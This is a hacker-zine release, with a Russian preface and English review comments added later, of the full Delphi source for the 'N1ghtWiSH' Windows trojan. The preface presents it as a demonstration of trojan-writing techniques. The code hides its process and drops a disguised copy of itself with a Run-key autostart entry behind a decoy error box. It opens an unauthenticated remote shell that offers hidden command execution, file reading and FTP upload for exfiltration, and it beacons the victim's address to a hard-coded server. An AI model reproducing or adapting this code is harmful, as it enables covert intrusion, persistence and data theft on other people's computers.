----------------------------------------------
#!/usr/share/doc/defaced/3/tandp/nightwish.txt
----------------------------------------------


                             [ N1ghtWiSH project ]
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ by defaced staff ]

B14cKh47z fUck1n s7uFf - WTF??? 

Вы  спросите,  что  это за херня? это был закрытый релиз ZUDteam =)) Короче, вот
исходник  трояна для windoz. Тут есть несколько интересных техник, которые могут
помочь  при  написании троя. Стоит сказать, что код _не_ оптимизирован, тут есть
много лишнего, но это не важно. Цель - показать идею.

---------------------------------// N1ghtWiSH.dpr
program N1ghtWiSH;

uses
  Forms, Registry,
  main in 'main.pas' {Form1};

  // Imported under the alias "hidenow": the kernel32 export RegisterServiceProcess.
  // Declared without parameters or calling convention; the arguments are pushed by
  // hand in the asm block below. The only visible purpose is to hide the process
  // (the alias says it, and it is called only on "Windows 98").
  procedure hidenow; external 'kernel32.dll' name 'RegisterServiceProcess';

{$R *.res}

var
VerReg: TRegistry;   // used once to read the Windows version string; never freed
winver: string;      // HKLM\Software\Microsoft\Windows\CurrentVersion\Version

{ Entry point. Creates the main form without ever showing it (TForm1.FormCreate in
  main.pas performs the install / persistence / listener start), tries to hide the
  process on Windows 98, then runs the message loop. }
begin
  Application.Initialize;
  Application.ShowMainForm:=false;        // no window is shown to the user
  Application.CreateForm(TForm1, Form1);  // FormCreate runs here: install, Run key, TCP listener, timer

VerReg:=TRegistry.Create;
VerReg.RootKey:=$80000002;                // = HKEY_LOCAL_MACHINE (main.pas opens the same key by that name)
VerReg.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winver:=VerReg.ReadString('Version');
if winver = 'Windows 98' then
                             begin
 try
    asm                          //  Original author's note: "I don't know exactly in which
    push 1                       //  Windows versions other than 98 register_service_process()
    push 0                       //  works, hence this hassle."
    call hidenow;                //  Arguments are pushed right-to-left (stdcall), so this is
    end;                         //  RegisterServiceProcess(0, 1); 0 presumably means "this
  except                         //  process" -- not verifiable from here. Any exception
  end;                           //  (e.g. the export is missing) is swallowed silently.
                             end;
VerReg.CloseKey;
Application.Run;
end.


// _EOF_ N1ghtWiSH.dpr




---------------------------------// main.pas

unit main;

interface

// тут много лишнего vvvv 

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Sockets, ExtCtrls, NMsmtp, ScktComp, StdCtrls,
  ComCtrls, FileCtrl, NMFtp, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, Psock, Registry,ShellAPI, IdRawBase, IdRawClient,
  IdIcmpClient;

type
  { The (never shown) main form. All components are instantiated from the .dfm,
    whose properties (timer interval, list box contents, etc.) are not visible here. }
  TForm1 = class(TForm)
    Watcher: TTimer;                 // beacon / uptime tick, see WatcherTimer
    SNIF: TTcpServer;                // command listener, bound to TCP 31339 in FormCreate
    FList: TFileListBox;             // used by the "dir" command to enumerate a directory
    FTP: TNMFTP;                     // FTP client for ftpput / ftpget, credentials from the config file
    CLIENT: TTcpClient;              // raw TCP client used for the hand-written HTTP POST beacon
    conffile: TListBox;              // in-memory config, persisted as <windir>\winass.dll (plain text)
    CheckBox1: TCheckBox;            // when checked, "process-list" also lists invisible / owned windows
    procedure FormCreate(Sender: TObject);                                   // install + listener start
    procedure SNIFAccept(Sender: TObject; ClientSocket: TCustomIpClient);    // per-connection command shell
    procedure WatcherTimer(Sender: TObject);                                 // timer tick: beacon + uptime

  private
    //
  public
      procedure KillProc(ClassName: PChar; WindowTitle: PChar);   // TerminateProcess of a window's owner
  end;

var
  Form1: TForm1;
  // statstr  : 'null' until the beacon has been sent, '31337' afterwards (WatcherTimer)
  // winddir  : SystemRoot read from the registry in FormCreate; the install directory
  // codename : bot identifier = config line 3 (local host name + random number)
  // oldip, newip, autoruner : not referenced anywhere in the visible code
  statstr,oldip,newip,winddir, autoruner, codename: string;
  ReG: TRegistry;           // shared registry object (ReG / Reg / reg are the same identifier)
  onlineTime: integer;      // uptime counter, +10 per Watcher tick; system-info formats it as h:m:s

implementation


{$R *.dfm}

{ Installation / startup routine, run when the hidden form is created.
  Persistence layout, relative to the Windows directory read from
  HKLM\Software\Microsoft\Windows\CurrentVersion\SystemRoot:
    <windir>\mstask666.exe  copy of this executable, registered for autostart as
                            value "mstask666" under HKLM\...\CurrentVersion\Run
    <windir>\winass.dll     NOT a DLL: a text file, one value per line:
                            0 = FTP host, 1 = FTP login, 2 = FTP password,
                            3 = codename (host name + random number)
  First run (either file missing): drop both files, set the Run value, show a
  decoy error box and request termination. Every run: re-assert the Run value,
  start the command listener on TCP 31339 and enable the beacon timer. }
procedure TForm1.FormCreate(Sender: TObject);
begin
onlineTime:=0;
ReG:=TRegistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winddir:=ReG.ReadString('SystemRoot');
// Already installed -> just load the config; otherwise install.
if (FileExists(winddir+'\winass.dll')=true) and (FileExists(winddir+'\mstask666.exe')=true) then ConfFile.Items.LoadFromFile(winddir+'\winass.dll') else begin
        CopyFile(Pchar(Application.ExeName),Pchar(winddir+'\mstask666.exe'),FALSE);   // FALSE = overwrite if present
        ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
        Reg.WriteString('mstask666',winddir+'\mstask666.exe');                         // autostart entry
        Chdir(winddir);
        Random(500);        // results discarded; no effect (Randomize follows anyway)
        Random(500);
        // Default config. Writing Strings[0..3] assumes the list box already holds
        // four items from the .dfm (not visible here) -- TODO confirm.
        ConfFile.Items.Strings[0]:='ftp.somethere.ru';
        ConfFile.Items.Strings[1]:='LAMER';
        ConfFile.Items.Strings[2]:='LAMER';
        Randomize;
        ConfFile.Items.Strings[3]:=SNIF.LocalHostName+IntToStr(Random(500));
        ConfFile.Items.SaveToFile('winass.dll');   // relative path: lands in winddir because of the Chdir above
        fileSetAttr(winddir+'\mstask666.exe',faSysfile);   // System attribute on both dropped files
        fileSetAttr(winddir+'\winass.dll',faSysfile);
        Reg.CloseKey;
        // Decoy: the victim sees a generic error and is told to delete the file
        // they ran; the copy in winddir stays.
        MessageBox(handle,'Sorry, but some wrong! Please, remove this file!','Error',MB_ICONWARNING);
        Application.Terminate;
        // NOTE(review): Application.Terminate only requests shutdown; the statements
        // below still execute on this first run.
        end;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if ReG.ValueExists('mstask666')= false then Reg.WriteString('mstask666',winddir+'\mstask666.exe');   // re-assert persistence
reg.CloseKey;
statstr:='null';             // "no beacon sent yet" (see WatcherTimer)
SNIF.LocalPort:='31339';     //   PORT TO LISTEN
SNIF.Active:=true;           // unauthenticated command shell, handled in SNIFAccept
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
codename:=confFile.Items.Strings[3];
Watcher.Enabled:=true;       // start the beacon / uptime timer
end;


{ Command handler for every client that connects to TCP port 31339.
  There is NO authentication: whoever connects gets the banner, the prompt
  "<hostname>> " and every command below. The loop never exits on its own;
  what Receiveln returns once the peer is gone is not visible here
  (presumably '' which is simply ignored).
  Commands ("?" prints the list):
    system-info    date/time and the uptime counter
    ftpput/ftpget  upload / download a local file to / from the configured FTP server
    dir            two-column listing of a directory
    find/findnext  FindFirst / FindNext with a mask
    view           dump any readable file, line by line, to the client
    exec           WinExec(<line>, SW_HIDE), after a y/n confirmation
    windows-list   captions of visible unowned top-level windows
    process-list   the same window walk (not processes); CheckBox1 widens it
    process-kill   TerminateProcess of the owner of a window, by caption
    windir         print the Windows directory
    viewconf       print FTP host, login and password in clear
    editconf       change them and rewrite winass.dll
    DIE-nahui      remove the Run value, then run "rundll32 user,disableoemlayer" }
procedure TForm1.SNIFAccept(Sender: TObject;
  ClientSocket: TCustomIpClient);
var

cmd,welc,comm, frem,floc,banner,onliner : string;   // cmd = command word, comm = follow-up answers
blank,ind1,ind2,ind3: integer;                      // ind3 doubles as an "ok to transfer" flag in ftpput/ftpget
finder : TSearchRec;                                // shared by "find" and "findnext" within one connection
Wnd : hWnd;
SysDate: TDateTime;
S: TStringList;                                     // only assigned inside "view"
buff: ARRAY [0..127] OF Char;                       // window captions are cut at 127 characters


begin
banner:=SNIF.LocalHostName;
if SNIF.LocalHostName = '' then banner:= SNIF.LocalHostAddr;   // fall back to the IP when there is no host name
ClientSocket.Sendln('  Welcome to N1ghtWiSH ('+banner+'), Master !');
welc := SNIF.LocalHostName+'> ';                                  // prompt, sent without a line break
   while true do
   begin
        ClientSocket.Sendln('',#13#10);
        ClientSocket.Sendln(welc,'');
        cmd:=ClientSocket.Receiveln(#13#10);
        if cmd <> '' then                      // empty lines are ignored
        begin
        if cmd = '?' then begin
                          ClientSocket.Sendln('ZUDteam N1ghtWiSH (Night Windows SHell =)',#13#10);
                          ClientSocket.Sendln('Nice to see you, Master!',#13#10);
                          ClientSocket.Sendln('',#13#10);
                          ClientSocket.Sendln('Commands:',#13#10);
                          ClientSocket.Sendln('system-info  - View some info about system',#13#10);     // ok
                          ClientSocket.Sendln('ftpput   - Upload file to ftp-serv',#13#10);   // ok
                          ClientSocket.Sendln('ftpget   - Download file from ftp-serv',#13#10);   // ok
                          ClientSocket.Sendln('dir   - view dir list',#13#10);                                     // ok
                          ClientSocket.Sendln('find  - searching files',#13#10);                                   // ok
                          ClientSocket.Sendln('findnext  - resume searching files',#13#10);
                          ClientSocket.Sendln('view  - file viewer',#13#10);                                      // ok
                          ClientSocket.Sendln('exec  - run any prog (you''l NOT see it!!!)',#13#10);              // ok
                          ClientSocket.Sendln('windows-list  - show list of all visible windows',#13#10);
                          ClientSocket.Sendln('process-list  - show processes on machine ',#13#10); //ok
                          ClientSocket.Sendln('process-kill  - kill process on machine ',#13#10);
                          ClientSocket.Sendln('windir  - display windows directory',#13#10); //ok
                          ClientSocket.Sendln('viewconf  - view current config',#13#10);             // ok
                          ClientSocket.Sendln('editconf  - set new config',#13#10);                  // ok
                          ClientSocket.Sendln('DIE-nahui - uninstall trojan',#13#10);
                          end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'exec' then
                          begin
                          // Runs an arbitrary command line with a hidden window after a y/n
                          // confirmation. Nothing is captured or returned, hence the warning.
                          ClientSocket.Sendln('YOU''L NOT SEE, WhAT GOING ON & USER CAN DETECT YOU!!! ',#13#10);
                          ClientSocket.Sendln('Are you sure (crazy;) ? [y/n] :','');
                          comm:=ClientSocket.Receiveln(#13#10);
                          if comm = 'y' then begin
                                        ClientSocket.Sendln('Ok, enter command: ','');
                                        comm:=ClientSocket.Receiveln(#13#10);
                                        WinExec(Pchar(comm),SW_HIDE);      // return value ignored
                                        end
                          else ClientSocket.Sendln('exec aborted (yeah...)',#13#10);
                          end
////////////////////////////////////////////////////////////////////////////////////////////////

else if cmd = 'windir' then begin
                               ClientSocket.Sendln('Windows dir: '+winddir,#13#10);   // winddir = SystemRoot (FormCreate)
                               end
////////////////////////////////////////////////////////////////////////////////////////////////

else if cmd = 'system-info' then begin
                               ClientSocket.Sendln('---==[ SOME SYSTEM INFO ]==---',#13#10);
                               Sysdate:=Time;                   // NOTE(review): Time is time-of-day only; the "Date:" line
                               ClientSocket.Sendln('',#13#10);  // below presumably does not show today's date (Now would)
                               ClientSocket.Sendln('Date: '+DateToStr(SysDate),#13#10);
                               ClientSocket.Sendln('Time: '+TimeToStr(SysDate),#13#10);
                               // onlineTime (+10 per Watcher tick) rendered as h:m:s, no zero padding
                               if onlineTime < 60 then onliner:='00:00:'+IntToStr(OnlineTime)
                               else if onlineTime< 3600 then begin
                                                             onliner:='00:'+IntToStr(OnlineTime div 60)+':'+IntTOStr(OnlineTime mod 60);
                                                             end
                               else begin
                                    onliner:=IntTOStr(OnLineTime div 3600)+':'+IntTOStr((OnLineTime mod 3600) div 60)+':'+IntToStr((OnLineTime mod 3600) mod 60);

                                    end;
                               ClientSocket.Sendln('Time ONLINE: '+onliner,#13#10);
                               end
////////////////////////////////////////////////////////////////////////////////////////////////

        else if cmd = 'dir' then  begin
                                  // Directory listing through the TFileListBox, printed two entries per
                                  // line: names shorter than 30 chars are padded with single spaces,
                                  // the next entry follows on the same line.
                                  ClientSocket.Sendln('Enter path: ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if DirectoryExists(comm)= false then  ClientSocket.Sendln('dir ('+comm+') not exist',#13#10)
                                  else begin

                                  Flist.Directory:=comm;
                                  if flist.Items.Count >0 then
                                     begin
                                     ind2:=0;
                                     ClientSocket.Sendln('------------------------------[ Files here: '+IntTOStr(flist.Items.Count)+']--',#13#10);
                                        while ind2 <= (flist.Items.Count-1) do
                                                begin
                                                        if StrLen(Pchar(flist.Items.Strings[ind2])) < 30 then begin
                                                                                                         ClientSocket.Sendln(flist.items.Strings[ind2],'');
                                                                                                           for blank:=0 to  (30-StrLen(Pchar(flist.Items.Strings[ind2]))) do
                                                                                                           begin
                                                                                                           ClientSocket.Sendln(' ','');
                                                                                                           end;
                                                                                                         end
                                                        else begin
                                                             ClientSocket.Sendln(flist.items.Strings[ind2],#13#10);
                                                             end;

                                                        if (ind2+1)<=(flist.Items.Count-1) then ClientSocket.Sendln(flist.items.Strings[ind2+1]+'   ',#13#10)
                                                        else  ClientSocket.Sendln('',#13#10);
                                                ind2 := ind2+2;
                                                end;
                                     end;
                                  end;

                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'process-list' then  begin
                                // Despite the name this walks top-level WINDOWS starting from the
                                // form's own handle (same as windows-list). With CheckBox1 checked,
                                // invisible and owned windows are included as well.
                                Wnd := GetWindow(Handle, gw_HWndFirst);
                                        ClientSocket.Sendln('-------------------------------------[ Process list: ]--',#13#10);
                                        while Wnd <> 0 do
                                        begin
                                            IF //(Wnd <> Application.Handle) AND {-own window}
                                            (IsWindowVisible(Wnd)or checkbox1.checked) AND {-invisible windows}
                                            ((GetWindow(Wnd, gw_Owner) = 0)or checkbox1.checked) AND {-child windows}
                                            (GetWindowText(Wnd, buff, sizeof(buff)) <> 0) {-windows without captions}
                                        then begin
                                          GetWindowText(Wnd, buff, sizeof(buff));
                                          ClientSocket.Sendln(buff,#13#10);
                                        end;
                                        Wnd := GetWindow(Wnd, gw_hWndNext);
                                        end;

                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'windows-list' then  begin
                                // Captions of visible, unowned top-level windows that have a title.
                                Wnd := GetWindow(Handle, gw_HWndFirst);
                                        while Wnd <> 0 do
                                        begin
                                        if IsWindowVisible(Wnd) and
                                        (GetWindow(Wnd, gw_Owner) = 0) and
                                        (GetWindowText(Wnd, buff, sizeof(buff)) <> 0)
                                        then begin
                                          GetWindowText(Wnd, buff, sizeof(buff));
                                          ClientSocket.Sendln((StrPas(buff)),#13#10);
                                        end;
                                        Wnd := GetWindow(Wnd, gw_hWndNext);
                                        end;

                                  end

////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'process-kill' then  begin
                                  // Kill by window caption (class name nil); see KillProc.
                                  ClientSocket.Sendln('Window caption: ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if comm <> '' then Form1.KillProc(nil,pchar(comm));
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'find' then begin
                                  // FindFirst with attribute mask $3F (= faAnyFile, every attribute).
                                  // The search handle is never released with FindClose. Name is reset
                                  // to 'None' after each answer so a failed call prints 'None'.
                                  ClientSocket.Sendln('Searchmask (i.e. "c:\Windoz\*.txt"): ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  FindFirst(comm,$0000003F,finder);
                                  ClientSocket.Sendln(finder.Name,#13#10);
                                  finder.Name:='None';
                                  end
        else if cmd = 'findnext' then begin
                                  // Continues the previous "find" of this connection; without one,
                                  // finder is an uninitialised local record.
                                  FindNext(finder);
                                  ClientSocket.Sendln(finder.Name,#13#10);
                                  finder.Name:='None';
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'view' then begin
                                  // Sends every line of an arbitrary readable file to the client.
                                  ClientSocket.Sendln('File localion (i.e. c:\win\Suprpass.txt): ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if FileExists(comm) = false then ClientSocket.Sendln(' file not exists',#13#10) else
                                       begin
                                         try
                                         S:= TStringList.Create;
                                         S.LoadFromFile(comm);
                                         ClientSocket.Sendln('-----------------------------------------------[ Strings: '+IntToStr(S.Count)+']--',#13#10);
                                            for ind1:= 0 to s.Count-1 do ClientSocket.Sendln(s.Strings[ind1],#13#10);
                                         except
                                         ClientSocket.Sendln('[!] Cant view!',#13#10);
                                         end;
                                         end;
                                  S.Destroy;   // NOTE(review): also reached in the "file not exists" branch, where S was never created
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'ftpput' then  begin
                                  // Exfiltration: uploads a local file to the FTP server from the config
                                  // (host / login / password set in FormCreate or by editconf).
                                  // Any exception in the whole sequence is reported as one line.
                                  ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
                                  try
                                  FTP.Connect;
                                  ind3:=1;
                                  ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
                                  ClientSocket.Sendln('Local File: ','');
                                  floc := ClientSocket.Receiveln(#13#10);
                                  ClientSocket.Sendln('Remote File: ','');
                                  frem := ClientSocket.Receiveln(#13#10);
                                  if (FileExists(floc) = false) then
                                      begin
                                      ClientSocket.Sendln('Local File not ExIST!',#13#10);
                                      ind3:=0;
                                      end;
                                  if (ind3 = 1) then FTP.Upload(floc,frem);
                                  FTP.Disconnect;
                                  except
                                        ClientSocket.Sendln('[!] Error !',#13#10);
                                  end;
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'ftpget' then  begin
                                  // Fetches a file from the same FTP server onto the victim's disk;
                                  // refuses to overwrite an existing local file.
                                  ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
                                  try
                                  FTP.Connect;
                                  ind3:=1;
                                  ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
                                  ClientSocket.Sendln('Remote File: ','');
                                  frem := ClientSocket.Receiveln(#13#10);
                                  ClientSocket.Sendln('Local File: ','');
                                  floc := ClientSocket.Receiveln(#13#10);
                                      if (FileExists(floc) = true) then
                                      begin
                                      ClientSocket.Sendln('tHis file already exists!',#13#10);
                                      ind3:=0;
                                      end;
                                  if (ind3 = 1) then FTP.Download(frem,floc);
                                  FTP.Disconnect;
                                  except
                                        ClientSocket.Sendln('[!] Error! ',#13#10);
                                  end;
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'viewconf' then begin
                                      // Dumps the FTP credentials in clear to whoever connected.
                                      ClientSocket.Sendln(' - Current N1ghtWiSH conf -',#13#10);
                                      ClientSocket.Sendln('System codename: '+codename,#13#10);
                                      ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
                                      ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
                                      ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
                                      end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'DIE-nahui' then begin
                                       // "Uninstall": only the Run value is deleted; mstask666.exe and
                                       // winass.dll stay on disk. Afterwards rundll32 is started with
                                       // "user,disableoemlayer" -- apparently meant to take the session
                                       // down (actual effect not verifiable here); errors are ignored.
                                       ClientSocket.Sendln(' -=DIE Haxyu`=- SELF-DESTROING MODE',#13#10);
                                       ClientSocket.Sendln('ARE YOU SURE? Type "B-nu39y-BCE" for start uninstall : ','');
                                       comm := ClientSocket.Receiveln(#13#10);
                                       if comm <> 'B-nu39y-BCE' then ClientSocket.Sendln(' - DESTROING CANCELED!',#13#10) else begin
                                               Reg:=TREgistry.Create;   // replaces the global ReG; the object from FormCreate is leaked
                                               ReG.RootKey:=HKEY_LOCAL_MACHINE;
                                               ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
                                               if Reg.ValueExists('mstask666') = true then Reg.DeleteValue('mstask666') else ClientSocket.Sendln('Cannot uNinStall ! prog is not in registry',#13#10);
                                               Reg.CloseKey;
                                               ClientSocket.Sendln(' - SELF-DESTROING IS ENABLED !!!',#13#10);
                                               ClientSocket.Sendln(' GOOD BYE, MASTER !  ;((( ',#13#10);
                                               Sleep(1000);
                                                  try
                                                  ShellExecute(handle,'open','rundll32','user,disableoemlayer',nil,SW_SHOWNORMAL);
                                                  except
                                                  end;
                                               end;
                                       end
////////////////////////////////////////////////////////////////////////////////////////////////

       else if cmd = 'editconf' then begin
                                      // Replaces FTP host / login / password in the in-memory config.
                                      // On 'y' the FTP component is updated and winass.dll rewritten
                                      // (cwd = winddir); otherwise the file is reloaded to drop the edits.
                                      ClientSocket.Sendln(' - Seting new N1ghtWiSH conf -',#13#10);
                                      ClientSocket.Sendln('Ftp-server: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[0]:=comm;
                                      ClientSocket.Sendln('Login: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[1]:= comm;
                                      ClientSocket.Sendln('Password: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[2]:=comm;
                                      ClientSocket.Sendln(' OK, Look at new setings: ',#13#10);
                                      ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
                                      ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
                                      ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
                                      ClientSocket.Sendln('LOAD NEW SETTINGS? [y/n]: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      chDir(winddir);
                                      if comm = 'y' then begin
                                                                FTP.Host:=ConfFile.Items.Strings[0];
                                                                FTP.UserID:=ConfFile.Items.Strings[1];
                                                                FTP.Password:=ConfFile.Items.Strings[2];
                                                                ConfFile.Items.SaveToFile('winass.dll');
                                                         end
                                      else ConfFile.Items.LoadFromFile('winass.dll');
                                      end
////////////////////////////////////////////////////////////////////////////////////////////////
        else ClientSocket.Sendln('! Unknown command (try "?" to get some info)',#13#10);
        end;
   end;

end; // IFAccept END

{ Timer tick (interval is set in the .dfm, not visible here). Implements the
  check-in beacon and the uptime counter shown by system-info:
    - LocalHostAddr = 127.0.0.1 is treated as "offline": statstr is reset so the
      next time a real address appears a fresh beacon is sent;
    - first tick with a real address: one hand-written HTTP POST to
      133.133.133.133:80, path /cgi-bin/nightwish.cgi, Host: statistics.hosting.net,
      body  action=add&addr=<ip>&host=<reverse lookup>&codename=<codename>&time=<date time>&os=win
      (not URL-encoded). Any failure is swallowed;
    - every later tick: onlineTime += 10 (so the interval is presumably 10 s
      -- TODO confirm against the .dfm). }
procedure TForm1.WatcherTimer(Sender: TObject);
var
myip,hostnam,date,sendstr1: String;
curDate: TDateTime;
len: integer;
begin

        if SNIF.LocalHostAddr <> '127.0.0.1' then begin
                if statstr = 'null' then begin
                        statstr:='31337';                        // mark "beacon sent"
                        myip :=SNIF.LocalHostAddr;
                        curDate:=Time;                           // time-of-day only, see system-info
                        date := DateToStr(curDate)+'  '+TimeToStr(curDate) ;
                        hostNam:=SNIF.LookupHostName(myip);      // reverse lookup of the victim's address
                        sendstr1 := 'action=add&addr='+myip+'&host='+hostnam+'&codename='+codename+'&time='+date+'&os=win';
                        len := StrLen(Pchar(sendstr1));
                        CLIENT.Active:=true;
                        CLIENT.RemoteHost:='133.133.133.133';    // hard-coded C2 / stats server
                        CLIENT.RemotePort:='80';
                        try
                                if (CLIENT.Connect) = true then
                                begin
                                CLIENT.Sendln('POST /cgi-bin/nightwish.cgi HTTP/1.1',#13#10);
                                CLIENT.Sendln('Host: statistics.hosting.net',#13#10);
                                CLIENT.Sendln('Content-Type: application/x-www-url-formencoded',#13#10);   // sic: not the standard x-www-form-urlencoded
                                CLIENT.Sendln('Content-Length: '+IntToStr(len),#13#10);                     // excludes the CRLF appended to the body below
                                CLIENT.Sendln('',#13#10);
                                CLIENT.Sendln(sendstr1,#13#10);
                                CLIENT.Disconnect;                                                          // response is never read
                                end;
                        except
                        end;
                end else onlineTime:=onlinetime+10;;
        end else
        begin
                statstr := 'null';                               // offline: beacon again on reconnect
        end;
end;

{ Terminate the process owning the first window that matches ClassName /
  WindowTitle (either may be nil; SNIFAccept passes nil and a caption).
  Sequence: FindWindow -> GetWindowThreadProcessId -> OpenProcess(PROCESS_TERMINATE)
  -> TerminateProcess with exit code 4.
  NOTE(review): no return value is checked. If FindWindow returns 0, ProcessID is
  left uninitialised and whatever it holds is passed to OpenProcess; the process
  handle is never closed (no CloseHandle). }
procedure TForm1.KillProc(ClassName: PChar; WindowTitle: PChar);
const
  PROCESS_TERMINATE = $0001;
var
  ProcessHandle : THandle;
  ProcessID: Integer;
  TheWindow : HWND;
begin
  TheWindow := FindWindow(Classname, WindowTitle);
  GetWindowThreadProcessID(TheWindow, @ProcessID);
  ProcessHandle := OpenProcess(PROCESS_TERMINATE, FALSE, ProcessId);
  TerminateProcess(ProcessHandle,4);
end;

end.


// _EOF_ main.pas